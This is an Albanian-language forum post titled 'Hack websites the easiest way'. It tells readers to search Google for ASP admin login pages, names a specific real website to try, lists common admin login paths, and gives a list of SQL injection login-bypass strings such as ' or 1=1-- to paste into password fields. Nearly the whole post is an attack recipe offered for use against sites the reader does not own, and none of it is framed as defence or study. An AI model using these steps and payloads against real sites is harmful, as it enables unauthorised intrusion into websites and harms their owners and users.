Hacko web menyra ma e leht

Shko poshtë

Hacko web menyra ma e leht

Mesazh  EliTe Crew prej Sun Jun 13, 2010 12:05 pm

Hyn tek google.com dhe tek google shkruan adminlogin.asp dhe paswordi eshte
apet admin po ka edhe raste qe nuk hapet se mund te varet nga
linja e internetit nga erroret qe mund te kete kompjuteri prandaj
po patet kohe provojini te gjitha paswordet dhe usenamet.
faqa duhet te lexoje poshte saj kete adrese www.tabcarolinas.com
shkon ne google edhe i shkruan keto nje nga nje
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
root/login.asp
admin/index.asp
paswordet duhet ti provosh te gjitha po patet kohe
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

EliTe Crew

Numri i postimeve : 158
Join date : 13/06/2010
Age : 26
Location : united cracker group

Shiko profilin e anëtarit

Mbrapsht në krye Shko poshtë

Mbrapsht në krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi